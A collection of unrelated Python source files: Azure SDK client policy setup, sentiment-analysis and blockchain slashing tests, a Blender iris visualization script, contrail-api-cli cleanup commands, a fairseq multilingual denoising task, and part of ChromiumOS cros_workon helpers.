self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.AsyncBearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
|
the-stack_106_16924
|
from sentiment import TweetAnalyser
from unittest.mock import patch
from unittest import mock
import pytest
def test_classify_tweet():
ta = TweetAnalyser("matthieu_run")
result = ta.classify_tweet("All is happy and well.")
assert result == 1
@patch("sentiment.pickle")
@patch("sentiment.os.path.abspath")
def test_set_classifier(mock_os_abspath, mock_pickle):
mock_os_abspath.return_value = (
"C:\\Users\\matth\\source\\repos\\sentiment_analyst\\sentiment_analyst\\ELSE.py"
)
mo = mock.mock_open(read_data="1")
with patch("builtins.open", mo):
TweetAnalyser("matthieu_run")
mo.assert_called_once()
mock_pickle.load.assert_called_once()
class TestTweet:
def __init__(self, tweet):
self.text = tweet
@pytest.mark.parametrize(
"new_tweets, expected_result",
[
(
[
TestTweet("happy"),
TestTweet("happy"),
TestTweet("happy"),
TestTweet("happy"),
TestTweet("happy"),
],
"positive",
),
(
[
TestTweet("sad"),
TestTweet("sad"),
TestTweet("sad"),
TestTweet("sad"),
TestTweet("sad"),
],
"negative",
),
],
)
@patch("sentiment.tweepy")
def test_main(mock_tweepy, new_tweets, expected_result):
ta = TweetAnalyser("matthieu_run")
mock_api = mock.MagicMock()
mock_tweepy.API.return_value = mock_api
mock_api.user_timeline.return_value = new_tweets
result = ta.main()
mock_tweepy.OAuthHandler.assert_called_once()
assert (
result
== f"The last 5 tweets of matthieu_run have generally been {expected_result}"
)
|
the-stack_106_16925
|
import datetime
from pathlib import Path
import pytest
from dateutil.parser import isoparse
from pystarport.ports import rpc_port
from .utils import (
cluster_fixture,
wait_for_block_time,
wait_for_new_blocks,
wait_for_port,
)
"""
slashing testing
"""
# use custom cluster, use an unique base port
@pytest.fixture(scope="module")
def cluster(worker_index, pytestconfig, tmp_path_factory):
"override cluster fixture for this test module"
yield from cluster_fixture(
Path(__file__).parent / "configs/slashing.yaml",
worker_index,
tmp_path_factory.mktemp("data"),
quiet=pytestconfig.getoption("supervisord-quiet"),
)
@pytest.mark.slow
def test_slashing(cluster):
"stop node2, wait for non-live slashing"
addr = cluster.address("validator", i=2)
val_addr = cluster.address("validator", i=2, bech="val")
tokens1 = int((cluster.validator(val_addr))["tokens"])
print("tokens before slashing", tokens1)
print("stop and wait for 10 blocks")
cluster.supervisor.stopProcess(f"{cluster.chain_id}-node2")
wait_for_new_blocks(cluster, 10)
cluster.supervisor.startProcess(f"{cluster.chain_id}-node2")
wait_for_port(rpc_port(cluster.base_port(2)))
val = cluster.validator(val_addr)
tokens2 = int(val["tokens"])
print("tokens after slashing", tokens2)
assert tokens2 == int(tokens1 * 0.99), "slash amount is not correct"
assert val["jailed"], "validator is jailed"
# try to unjail
rsp = cluster.unjail(addr, i=2)
assert rsp["code"] == 4, "still jailed, can't be unjailed"
# wait for 60s and unjail again
wait_for_block_time(
cluster, isoparse(val["unbonding_time"]) + datetime.timedelta(seconds=60)
)
rsp = cluster.unjail(addr, i=2)
assert rsp["code"] == 0, f"unjail should success {rsp}"
wait_for_new_blocks(cluster, 3)
assert len(cluster.validators()) == 3
|
the-stack_106_16927
|
import bpy
import bmesh
import numpy as np
import utils
from mathutils import Vector, Matrix
from math import pi
def PCA(data, num_components=None):
# mean center the data
data -= data.mean(axis=0)
# calculate the covariance matrix
R = np.cov(data, rowvar=False)
# calculate eigenvectors & eigenvalues of the covariance matrix
# use 'eigh' rather than 'eig' since R is symmetric,
# the performance gain is substantial
V, E = np.linalg.eigh(R)
# sort eigenvalue in decreasing order
idx = np.argsort(V)[::-1]
E = E[:,idx]
# sort eigenvectors according to same index
V = V[idx]
# select the first n eigenvectors (n is desired dimension
# of rescaled data array, or dims_rescaled_data)
E = E[:, :num_components]
# carry out the transformation on the data using eigenvectors
# and return the re-scaled data, eigenvalues, and eigenvectors
return np.dot(E.T, data.T).T, V, E
def load_iris():
try:
# Load Iris dataset from the sklearn.datasets package
from sklearn import datasets
from sklearn import decomposition
# Load Dataset
iris = datasets.load_iris()
X = iris.data
y = iris.target
labels = iris.target_names
# Reduce components by Principal Component Analysis from sklearn
X = decomposition.PCA(n_components=3).fit_transform(X)
except ImportError:
# Load Iris dataset manually
path = os.path.join('data', 'iris', 'iris.data')
iris_data = np.genfromtxt(path, dtype='str', delimiter=',')
X = iris_data[:, :4].astype(dtype=float)
y = np.ndarray((X.shape[0],), dtype=int)
# Create target vector y and corresponding labels
labels, idx = [], 0
for i, label in enumerate(iris_data[:, 4]):
label = label.split('-')[1]
if label not in labels:
labels.append(label); idx += 1
y[i] = idx - 1
# Reduce components by implemented Principal Component Analysis
X = PCA(X, 3)[0]
return X, y, labels
def createScatter(X, y, size=0.25):
labelIndices = set(y)
colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), \
(1, 1, 0), (1, 0, 1), (0, 1, 1)]
# Create a bmesh for each label
bmList = []
for labelIdx in labelIndices:
bmList.append(bmesh.new())
# Iterate through all the vectors and targets
for x, labelIdx in zip(X, y):
# Use the vector as translation for each point
T = Matrix.Translation(x)
if labelIdx % 3 == 0:
bmesh.ops.create_cube(bmList[labelIdx],
size=size, matrix=T)
elif labelIdx % 3 == 1:
bmesh.ops.create_icosphere(bmList[labelIdx],
diameter=size/2, matrix=T)
else:
bmesh.ops.create_cone(bmList[labelIdx],
segments=6, cap_ends=True,
diameter1=size/2, diameter2=0,
depth=size, matrix=T)
objects = []
for labelIdx, color in zip(labelIndices, colors):
# Create a mesh from the existing bmesh
mesh = bpy.data.meshes.new('ScatterMesh {}'.format(labelIdx))
bmList[labelIdx].to_mesh(mesh)
bmList[labelIdx].free()
# Create a object with the mesh and link it to the scene
obj = bpy.data.objects.new('ScatterObject {}'.format(labelIdx), mesh)
bpy.context.scene.objects.link(obj)
# Create materials for each bmesh
mat = bpy.data.materials.new('ScatterMaterial {}'.format(labelIdx))
mat.diffuse_color = color
mat.diffuse_intensity = 0.5
mat.specular_intensity = 0.0
obj.data.materials.append(mat)
objects.append(obj)
def createLabels(X, y, labels, cameraObj=None):
labelIndices = set(y)
objects = []
# Draw labels
for labelIdx in labelIndices:
center = np.sum([x for x, idx in zip(X, y) \
if idx == labelIdx], axis=0)
counts = (y == labelIdx).sum()
center = Vector(center) / counts
label = labels[labelIdx]
fontCurve = bpy.data.curves.new(type="FONT", name=label)
fontCurve.body = label
fontCurve.align_x = 'CENTER'
fontCurve.align_y = 'BOTTOM'
fontCurve.size = 0.6
obj = bpy.data.objects.new("Label {}".format(label), fontCurve)
obj.location = center + Vector((0, 0, 0.8))
obj.rotation_mode = 'AXIS_ANGLE'
obj.rotation_axis_angle = (pi/2, 1, 0, 0)
bpy.context.scene.objects.link(obj)
if cameraObj is not None:
constraint = obj.constraints.new('LOCKED_TRACK')
constraint.target = cameraObj
constraint.track_axis = 'TRACK_Z'
constraint.lock_axis = 'LOCK_Y'
objects.append(obj)
bpy.context.scene.update()
return objects
if __name__ == '__main__':
# Remove all elements
utils.removeAll()
# Set ambient occlusion
utils.setAmbientOcclusion()
# Create camera and lamp
targetObj, cameraObj, lampObj = utils.simpleScene(
(0, 0, 0), (6, 6, 3.5), (-5, 5, 10))
# Make target as parent of camera
cameraObj.parent = targetObj
# Set number of frames
bpy.context.scene.frame_end = 50
# Animate rotation of target by keyframe animation
targetObj.rotation_mode = 'AXIS_ANGLE'
targetObj.rotation_axis_angle = (0, 0, 0, 1)
targetObj.keyframe_insert(data_path='rotation_axis_angle', index=-1,
frame=bpy.context.scene.frame_start)
targetObj.rotation_axis_angle = (2*pi, 0, 0, 1)
# Set last frame to one frame further to have an animation loop
targetObj.keyframe_insert(data_path='rotation_axis_angle', index=-1,
frame=bpy.context.scene.frame_end + 1)
# Change each created keyframe point to linear interpolation
for fcurve in targetObj.animation_data.action.fcurves:
for keyframe in fcurve.keyframe_points:
keyframe.interpolation = 'LINEAR'
X, y, labels = load_iris()
createScatter(X, y)
createLabels(X, y, labels, cameraObj)
# Create a grid
bpy.ops.mesh.primitive_grid_add(
radius=3,
location=(0, 0, 0),
x_subdivisions=15,
y_subdivisions=15)
grid = bpy.context.active_object
# Create grid material
gridMat = bpy.data.materials.new('GridMaterial')
gridMat.type = 'WIRE'
gridMat.use_transparency = True
gridMat.alpha = 0.3
grid.data.materials.append(gridMat)
utils.renderToFolder('frames', 'fisher_iris_visualization', 500, 500,
animation=True)
|
the-stack_106_16928
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from contrail_api_cli.utils import printo, parallel_map
from contrail_api_cli.exceptions import ResourceNotFound
from ..utils import CheckCommand, PathCommand
class CleanSIScheduling(CheckCommand, PathCommand):
"""On some occasion a SI VM can be scheduled on multiple virtual-routers.
In such case the command will remove extraenous VR links on the SI VM::
contrail-api-cli --ns contrail_api_cli.clean clean-si-scheduling [service-instance/uuid]
``--check`` and ``--dry-run`` options are available.
"""
description = "Clean bad vrouter scheduling"
@property
def resource_type(self):
return "service-instance"
def _clean_vm(self, vm):
for vr in vm.get('virtual_router_back_refs')[1:]:
if not self.dry_run:
vm.remove_back_ref(vr)
printo("Removed %s from %s" % (vr.fq_name, vm.uuid))
def _check_si(self, si):
try:
si.fetch()
except ResourceNotFound:
return
for vm in si.get('virtual_machine_back_refs', []):
vm.fetch()
if len(vm.get('virtual_router_back_refs', [])) > 1:
printo('SI %s VM %s is scheduled on %s' %
(si.path, vm.uuid, ", ".join([
str(vr.fq_name)
for vr in vm['virtual_router_back_refs']
])))
if self.check is not True:
self._clean_vm(vm)
def __call__(self, paths=None, **kwargs):
super(CleanSIScheduling, self).__call__(**kwargs)
parallel_map(self._check_si, self.resources, workers=50)
class CleanStaleSI(CheckCommand, PathCommand):
"""Clean stale service instances.
SIs are considered stale when:
* LBaaS SI has no pool
* LBaaS SI pool has no VIP
* LBaas SI VIP has no instance-ip
* SNAT SI has no logical-router
To run the command::
contrail-api-cli --ns contrail_api_cli.ns clean-stale-si [service-instance/uuid]
``--check`` and ``--dry-run`` options are available.
"""
description = "Clean stale SIs"
@property
def resource_type(self):
return "service-instance"
def _is_stale_snat(self, si):
"""Return True if the snat SI is stale.
"""
if 'logical_router_back_refs' not in si:
printo('[%s] No logical router attached to SI' % si.uuid)
return True
return False
def _is_stale_lbaas(self, si):
"""Return True if the lbaas SI is stale.
"""
if (('loadbalancer_pool_back_refs' not in si or
len(si['loadbalancer_pool_back_refs']) == 0) and
('loadbalancer_back_refs' not in si or
len(si['loadbalancer_back_refs']) == 0)):
printo('[%s] No pool or loadbalancer attached to SI' % si.uuid)
return True
# lbaas v1
if 'loadbalancer_pool_back_refs' in si:
pool = si['loadbalancer_pool_back_refs'][0]
pool.fetch()
if 'virtual_ip_back_refs' not in pool:
printo('[%s] No VIP attached to pool' % si.uuid)
return True
vip = pool['virtual_ip_back_refs'][0]
vip.fetch()
if 'virtual_machine_interface_refs' not in vip:
printo('[%s] No VMI for VIP' % si.uuid)
return True
vip_vmi = vip['virtual_machine_interface_refs'][0]
vip_vmi.fetch()
if 'instance_ip_back_refs' not in vip_vmi:
printo('[%s] No IIP found for VIP VMI' % si.uuid)
return True
return False
def _remove_back_ref(self, si, r1, r2):
printo('[%s] Remove back_ref from %s to %s' % (si.uuid, str(r1.path),
str(r2.path)))
if not self.dry_run:
r1.remove_back_ref(r2)
def _delete_res(self, si, r):
printo('[%s] Delete %s' % (si.uuid, str(r.path)))
if not self.dry_run:
r.delete()
def _clean_lbaas_si(self, si):
printo('[%s] Cleaning stale lbaas' % si.uuid)
for pool in si.get('loadbalancer_pool_back_refs', []):
pool.fetch()
for vip in pool.get('virtual_ip_back_refs', []):
vip.fetch()
vip_vmis = vip.get('virtual_machine_interface_refs', [])
self._delete_res(si, vip)
for vmi in vip_vmis:
self._delete_res(si, vmi)
self._remove_back_ref(si, si, pool)
def _clean_si(self, si):
for vm in si.get('virtual_machine_back_refs', []):
vm.fetch()
for vr in vm.get('virtual_router_back_refs', []):
self._remove_back_ref(si, vm, vr)
for vmi in vm.get('virtual_machine_interface_back_refs', []):
vmi.fetch()
for fip in vmi.get('floating_ip_back_refs', []):
fip.fetch()
if len(fip['virtual_machine_interface_refs']) > 1:
self._remove_back_ref(si, vmi, fip)
else:
self._delete_res(si, fip)
for iip in vmi.get('instance_ip_back_refs', []):
iip.fetch()
if len(iip['virtual_machine_interface_refs']) > 1:
self._remove_back_ref(si, vmi, iip)
else:
self._delete_res(si, iip)
self._delete_res(si, vmi)
self._delete_res(si, vm)
self._delete_res(si, si)
def _check_si(self, si):
si.fetch()
try:
si_t = si['service_template_refs'][0]
except (KeyError, IndexError):
printo('[%s] SI %s has no template, skipping.' % (si.uuid,
str(si.path)))
return
if ('haproxy-loadbalancer-template' in si_t.fq_name and
self._is_stale_lbaas(si)):
printo('[%s] Found stale lbaas %s' % (si.uuid, str(si.fq_name)))
if self.check is not True:
self._clean_lbaas_si(si)
self._clean_si(si)
if 'netns-snat-template' in si_t.fq_name and self._is_stale_snat(si):
printo('[%s] Found stale SNAT %s' % (si.uuid, str(si.fq_name)))
if self.check is not True:
self._clean_si(si)
def __call__(self, paths=None, **kwargs):
super(CleanStaleSI, self).__call__(**kwargs)
parallel_map(self._check_si, self.resources, workers=50)
|
the-stack_106_16930
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import numpy as np
from fairseq.data import (
data_utils,
Dictionary,
AppendTokenDataset,
ConcatDataset,
DenoisingDataset,
PrependTokenDataset,
ResamplingDataset,
SortDataset,
TokenBlockDataset,
)
from .denoising import DenoisingTask
from fairseq.data.encoders.utils import get_whole_word_mask
from fairseq.tasks import register_task
logger = logging.getLogger(__name__)
@register_task('multilingual_denoising')
class MultilingualDenoisingTask(DenoisingTask):
@staticmethod
def add_args(parser):
DenoisingTask.add_args(parser)
parser.add_argument('--multilang-sampling-alpha', type=float, default=1.0,
help='smoothing alpha for sample rations across multiple datasets')
parser.add_argument('--add-lang-token', default=False, action='store_true')
parser.add_argument('--langs', type=str, help="language ids we are considering", default=None)
@classmethod
def setup_task(cls, args, **kwargs):
"""Setup the task.
"""
paths = args.data.split(':')
assert len(paths) > 0
dictionary = Dictionary.load(os.path.join(paths[0], 'dict.txt'))
data_path = paths[0]
if args.langs is None:
languages = sorted([
name for name in os.listdir(data_path)
if os.path.isdir(os.path.join(data_path, name))
])
else:
languages = sorted(args.langs.split(','))
for name in languages:
assert os.path.exists(os.path.join(data_path, name)), \
"{} does not exist".format(os.path.join(data_path, name))
if args.add_lang_token:
for lang in languages:
dictionary.add_symbol('[{}]'.format(lang))
logger.info("| dictionary: {} types".format(len(dictionary)))
if not hasattr(args, 'shuffle_instance'):
args.shuffle_instance = False
return cls(args, dictionary)
def __init__(self, args, dictionary):
super().__init__(args, dictionary)
self.dictionary = dictionary
self.seed = args.seed
# add mask token
self.mask_idx = self.dictionary.add_symbol('<mask>')
self.langs = args.langs
self.args = args
def _get_sample_prob(self, dataset_lens):
"""
Get smoothed sampling porbability by languages. This helps low resource
languages by upsampling them.
"""
prob = dataset_lens / dataset_lens.sum()
smoothed_prob = prob ** self.args.multilang_sampling_alpha
smoothed_prob = smoothed_prob / smoothed_prob.sum()
return smoothed_prob
def load_dataset(self, split, epoch=0, combine=False, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
paths = self.args.data.split(':')
assert len(paths) > 0
data_path = paths[epoch % len(paths)]
split_path = os.path.join(data_path, split)
if self.langs is None:
languages = sorted([
name for name in os.listdir(data_path)
if os.path.isdir(os.path.join(data_path, name))
])
else:
languages = sorted(self.langs.split(','))
for name in languages:
assert os.path.exists(os.path.join(data_path, name)), "all the languages must exist"
logger.info("| Training on {0} languages: {1}".format(len(languages), languages))
logger.info("| Language to id mapping: ", {
lang: id for id, lang in enumerate(languages)
}
)
mask_whole_words = get_whole_word_mask(self.args, self.dictionary)
lang_datasets = []
for language in languages:
split_path = os.path.join(data_path, language, split)
dataset = data_utils.load_indexed_dataset(
split_path,
self.source_dictionary,
self.args.dataset_impl,
combine=combine,
)
if dataset is None:
raise FileNotFoundError('Dataset not found: {} ({})'.format(split, split_path))
end_token = self.source_dictionary.index('[{}]'.format(language)) \
if self.args.add_lang_token else self.source_dictionary.eos()
# create continuous blocks of tokens
dataset = TokenBlockDataset(
dataset,
dataset.sizes,
self.args.tokens_per_sample - 2, # one less for <s>
pad=self.source_dictionary.pad(),
eos=end_token,
break_mode=self.args.sample_break_mode,
)
logger.info('| loaded {} blocks from: {}'.format(len(dataset), split_path))
# prepend beginning-of-sentence token (<s>, equiv. to [CLS] in BERT)
dataset = PrependTokenDataset(dataset, self.source_dictionary.bos())
dataset = AppendTokenDataset(dataset, end_token)
lang_dataset = DenoisingDataset(
dataset,
dataset.sizes,
self.dictionary,
self.mask_idx,
mask_whole_words,
shuffle=self.args.shuffle_instance,
seed=self.seed,
args=self.args,
eos=None if not self.args.add_lang_token else self.source_dictionary.index('[{}]'.format(language)),
)
lang_datasets.append(lang_dataset)
dataset_lengths = np.array(
[len(d) for d in lang_datasets],
dtype=float,
)
logger.info(
'| loaded total {} blocks for all languages'.format(
dataset_lengths.sum(),
)
)
if split == self.args.train_subset:
# For train subset, additionally up or down sample languages.
sample_probs = self._get_sample_prob(dataset_lengths)
logger.info("| Sample probability by language: ", {
lang: "{0:.4f}".format(sample_probs[id])
for id, lang in enumerate(languages)
}
)
size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths
logger.info("| Up/Down Sampling ratio by language: ", {
lang: "{0:.2f}".format(size_ratio[id])
for id, lang in enumerate(languages)
}
)
resampled_lang_datasets = [
ResamplingDataset(
lang_datasets[i],
size_ratio=size_ratio[i],
seed=self.args.seed,
epoch=epoch,
replace=size_ratio[i] >= 1.0,
)
for i, d in enumerate(lang_datasets)
]
dataset = ConcatDataset(
resampled_lang_datasets,
)
else:
dataset = ConcatDataset(lang_datasets)
lang_splits = [split]
for lang_id, lang_dataset in enumerate(lang_datasets):
split_name = split + '_' + languages[lang_id]
lang_splits.append(split_name)
self.datasets[split_name] = lang_dataset
if split in self.args.valid_subset:
self.args.valid_subset = self.args.valid_subset.replace(
split, ','.join(lang_splits)
)
with data_utils.numpy_seed(self.args.seed + epoch):
shuffle = np.random.permutation(len(dataset))
self.datasets[split] = SortDataset(
dataset,
sort_order=[
shuffle,
dataset.sizes,
],
)
|
the-stack_106_16931
|
# -*- coding: utf-8 -*-
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Routines and a delegate for dealing with locally worked on packages."""
from __future__ import print_function
import collections
import glob
import os
import re
import sys
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import git
from chromite.lib import osutils
from chromite.lib import portage_util
from chromite.lib import sysroot_lib
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
# A package is a canonical CP atom.
# A package may have 0 or more repositories, given as strings.
# Each repository may be mapped into our workspace at some path.
PackageInfo = collections.namedtuple('PackageInfo',
('package', 'repos', 'src_paths'))
def _IsWorkonEbuild(include_chrome, ebuild_path, ebuild_contents=None):
"""Returns True iff the ebuild at |ebuild_path| is a workon ebuild.
This means roughly that the ebuild is compatible with our cros_workon based
system. For most packages, this means that it inherits the cros-workon
overlay.
Args:
include_chrome: True iff we should include Chrome and chromium-source
packages.
ebuild_path: path an ebuild in question.
ebuild_contents: None, or the contents of the ebuild at |ebuild_path|.
If None, _IsWorkonEbuild will read the contents of the ebuild when
necessary.
Returns:
True iff the ebuild can be used with cros_workon.
"""
# TODO(rcui): remove special casing of chromeos-chrome here when we make it
# inherit from cros-workon / chromium-source class (chromium-os:19259).
if (include_chrome and
portage_util.EbuildToCP(ebuild_path) == constants.CHROME_CP):
return True
workon_eclasses = 'cros-workon'
if include_chrome:
workon_eclasses += '|chromium-source'
ebuild_contents = ebuild_contents or osutils.ReadFile(ebuild_path)
if re.search('^inherit .*(%s)' % workon_eclasses,
ebuild_contents, re.M):
return True
return False
def _GetLinesFromFile(path, line_prefix, line_suffix):
"""Get a unique set of lines from a file, stripping off a prefix and suffix.
Rejects lines that do not start with |line_prefix| or end with |line_suffix|.
Returns an empty set if the file at |path| does not exist.
Discards duplicate lines.
Args:
path: path to file.
line_prefix: prefix of line to look for and strip if found.
line_suffix: suffix of line to look for and strip if found.
Returns:
A list of filtered lines from the file at |path|.
"""
if not os.path.exists(path):
return set()
# Note that there is an opportunity to race with the file system here.
lines = set()
for line in osutils.ReadFile(path).splitlines():
if not line.startswith(line_prefix) or not line.endswith(line_suffix):
logging.warning('Filtering out malformed line: %s', line)
continue
lines.add(line[len(line_prefix):-len(line_suffix)])
return lines
def _WriteLinesToFile(path, lines, line_prefix, line_suffix):
"""Write a set of lines to a file, adding prefixes, suffixes and newlines.
Args:
path: path to file.
lines: iterable of lines to write.
line_prefix: string to prefix each line with.
line_suffix: string to append to each line before a newline.
"""
contents = ''.join(
['%s%s%s\n' % (line_prefix, line, line_suffix) for line in lines])
if not contents:
osutils.SafeUnlink(path)
else:
osutils.WriteFile(path, contents, makedirs=True)
def GetWorkonPath(source_root=constants.CHROOT_SOURCE_ROOT, sub_path=None):
"""Get the path to files related to packages we're working locally on.
Args:
source_root: path to source root inside chroot.
sub_path: optional path to file relative to the workon root directory.
Returns:
path to the workon root directory or file within the root directory.
"""
ret = os.path.join(source_root, '.config/cros_workon')
if sub_path:
ret = os.path.join(ret, sub_path)
return ret
class WorkonError(Exception):
"""Raised when invariants of the WorkonHelper are violated."""
def _FilterWorkonOnlyEbuilds(ebuilds):
"""Filter a list of ebuild paths to only with those no stable version.
Args:
ebuilds: list of string paths to ebuild files
(e.g. ['/prefix/sys-app/app/app-9999.ebuild'])
Returns:
list of ebuild paths meeting this criterion.
"""
result = []
for ebuild_path in ebuilds:
ebuild_pattern = os.path.join(os.path.dirname(ebuild_path), '*.ebuild')
stable_ebuilds = [path for path in glob.glob(ebuild_pattern)
if not path.endswith('-9999.ebuild')]
if not stable_ebuilds:
result.append(ebuild_path)
return result
def ListAllWorkedOnAtoms(src_root=constants.CHROOT_SOURCE_ROOT):
"""Get a list of all atoms we're currently working on.
Args:
src_root: path to source root inside chroot.
Returns:
Dictionary of atoms marked as worked on (e.g. ['chromeos-base/shill']) for
each system.
"""
workon_dir = GetWorkonPath(source_root=src_root)
if not os.path.isdir(workon_dir):
return dict()
system_to_atoms = dict()
for file_name in os.listdir(workon_dir):
if file_name.endswith('.mask'):
continue
file_contents = osutils.ReadFile(os.path.join(workon_dir, file_name))
atoms = []
for line in file_contents.splitlines():
match = re.match('=(.*)-9999', line)
if match:
atoms.append(match.group(1))
if atoms:
system_to_atoms[os.path.basename(file_name)] = atoms
return system_to_atoms
class WorkonHelper(object):
"""Delegate that knows how to mark packages as being worked on locally.
This class assumes that we're executing in the build root.
"""
def __init__(self, sysroot, friendly_name=None, verbose=False,
src_root=constants.CHROOT_SOURCE_ROOT):
"""Construct an instance.
Args:
sysroot: path to sysroot to work on packages within.
friendly_name: friendly name of the system
(e.g. 'host', <board name>, or a brick friendly name).
Defaults to 'host' if sysroot is '/' or the last component of the
sysroot path.
verbose: boolean True iff we should print a lot more command output.
This is intended for debugging, and you should never cause a script
to depend on behavior enabled by this flag.
src_root: path to source root inside chroot.
"""
self._sysroot = sysroot
if friendly_name:
self._system = friendly_name
else:
self._system = ('host' if sysroot == '/'
else os.path.basename(sysroot.rstrip('/')))
self._verbose = verbose
self._src_root = src_root
self._cached_overlays = None
self._cached_arch = None
profile = os.path.join(self._sysroot, 'etc', 'portage')
self._unmasked_symlink = os.path.join(
profile, 'package.unmask', 'cros-workon')
self._keywords_symlink = os.path.join(
profile, 'package.keywords', 'cros-workon')
self._masked_symlink = os.path.join(
profile, 'package.mask', 'cros-workon')
# Clobber and re-create the WORKON_FILE symlinks every time. This is a
# trivial operation and eliminates all kinds of corner cases as well as any
# possible future renames of WORKON_FILE.
# In particular, we build the chroot as a board (amd64-host), bundle it and
# unpack it on /. After unpacking, the symlinks will point to
# .config/cros_workon/amd64-host instead of .config/cros_workon/host.
# Regenerating the symlinks here corrects it. crbug.com/23096.
# Note: This is currently also relied upon as an indirect fix for
# crbug.com/679831. Search the bug number for instance(s).
self._RefreshSymlinks()
@property
def workon_file_path(self):
"""Returns path to the file holding our currently worked on atoms."""
return GetWorkonPath(source_root=self._src_root, sub_path=self._system)
@property
def masked_file_path(self):
"""Returns path to file masking non-9999 ebuilds for worked on atoms."""
return self.workon_file_path + '.mask'
@property
def _arch(self):
if self._cached_arch is None:
self._cached_arch = sysroot_lib.Sysroot(
self._sysroot).GetStandardField(sysroot_lib.STANDARD_FIELD_ARCH)
return self._cached_arch
@property
def _overlays(self):
"""Returns overlays installed for the selected system."""
if self._cached_overlays is None:
sysroot = sysroot_lib.Sysroot(self._sysroot)
portdir_overlay = sysroot.GetStandardField('PORTDIR_OVERLAY')
if portdir_overlay:
self._cached_overlays = portdir_overlay.strip().splitlines()
else:
# This command is exceptionally slow, and we don't expect the list of
# overlays to change during the lifetime of WorkonHelper.
self._cached_overlays = portage_util.FindSysrootOverlays(self._sysroot)
return self._cached_overlays
def _SetWorkedOnAtoms(self, atoms):
"""Sets the unmasked atoms.
This will generate both the unmasked atom list and the masked atoms list as
the two files mention the same atom list.
Args:
atoms: Atoms to unmask.
"""
_WriteLinesToFile(self.workon_file_path, atoms, '=', '-9999')
_WriteLinesToFile(self.masked_file_path, atoms, '<', '-9999')
self._RefreshSymlinks()
def _RefreshSymlinks(self):
"""Recreates the symlinks.
This will create the three symlinks needed:
* package.mask/cros-workon: list of packages to mask.
* package.unmask/cros-workon: list of packages to unmask.
* package.keywords/cros-workon: list of hidden packages to accept.
"""
if not os.path.exists(self._sysroot):
return
for target, symlink in ((self.masked_file_path, self._masked_symlink),
(self.workon_file_path, self._unmasked_symlink),
(self.workon_file_path, self._keywords_symlink)):
if os.path.exists(target):
osutils.SafeMakedirs(os.path.dirname(symlink), sudo=True)
osutils.SafeSymlink(target, symlink, sudo=True)
else:
logging.debug("Symlink %s already exists. Don't recreate it.",
symlink)
def _AtomsToEbuilds(self, atoms):
"""Maps from a list of CP atoms to a list of corresponding -9999 ebuilds.
Args:
atoms: iterable of portage atoms (e.g. ['sys-apps/dbus']).
Returns:
list of ebuilds corresponding to those atoms.
"""
atoms_to_ebuilds = dict([(atom, None) for atom in atoms])
for overlay in self._overlays:
ebuild_paths = glob.glob(
os.path.join(overlay, '*-*', '*', '*-9999.ebuild'))
for ebuild_path in ebuild_paths:
atom = portage_util.EbuildToCP(ebuild_path)
if atom in atoms_to_ebuilds:
atoms_to_ebuilds[atom] = ebuild_path
ebuilds = []
for atom, ebuild in atoms_to_ebuilds.items():
if ebuild is None:
raise WorkonError('Could not find ebuild for atom %s' % atom)
ebuilds.append(ebuild)
return ebuilds
def _GetCanonicalAtom(self, package, find_stale=False):
"""Transform a package name or name fragment to the canonical atom.
If there are multiple atoms that a package name fragment could map to,
picks an arbitrary one and prints a warning.
Args:
package: string package name or fragment of a name.
find_stale: if True, allow stale (missing) worked on package.
Returns:
string canonical atom name (e.g. 'sys-apps/dbus')
"""
# Attempt to not hit portage if at all possible for speed.
if package in self._GetWorkedOnAtoms():
return package
# Ask portage directly what it thinks about that package.
ebuild_path = self._FindEbuildForPackage(package)
# If portage didn't know about that package, try and autocomplete it.
if ebuild_path is None:
possible_ebuilds = set()
for ebuild in (portage_util.EbuildToCP(ebuild) for ebuild in
self._GetWorkonEbuilds(filter_on_arch=False)):
if package in ebuild:
possible_ebuilds.add(ebuild)
# Also autocomplete from the worked-on list, in case the ebuild was
# deleted.
if find_stale:
for ebuild in self._GetWorkedOnAtoms():
if package in ebuild:
possible_ebuilds.add(ebuild)
if not possible_ebuilds:
logging.warning('Could not find canonical package for "%s"', package)
return None
# We want some consistent order for making our selection below.
possible_ebuilds = sorted(possible_ebuilds)
if len(possible_ebuilds) > 1:
logging.warning('Multiple autocompletes found:')
for possible_ebuild in possible_ebuilds:
logging.warning(' %s', possible_ebuild)
autocompleted_package = portage_util.EbuildToCP(possible_ebuilds[0])
# Sanity check to avoid infinite loop.
if package == autocompleted_package:
logging.error('Resolved %s to itself', package)
return None
logging.info('Autocompleted "%s" to: "%s"',
package, autocompleted_package)
return self._GetCanonicalAtom(autocompleted_package)
if not _IsWorkonEbuild(True, ebuild_path):
msg = ('In order to cros_workon a package, it must have a -9999 ebuild '
'that inherits from cros-workon.\n')
if '-9999' in ebuild_path:
msg += ('"%s" is a -9999 ebuild, make sure it inherits from '
'cros-workon.\n' % ebuild_path)
else:
msg += '"%s" is not a -9999 ebuild.\n' % ebuild_path
logging.warning(msg)
return None
return portage_util.EbuildToCP(ebuild_path)
def _GetCanonicalAtoms(self, packages, find_stale=False):
"""Transforms a list of package name fragments into a list of CP atoms.
Args:
packages: list of package name fragments.
find_stale: if True, allow stale (missing) worked on package.
Returns:
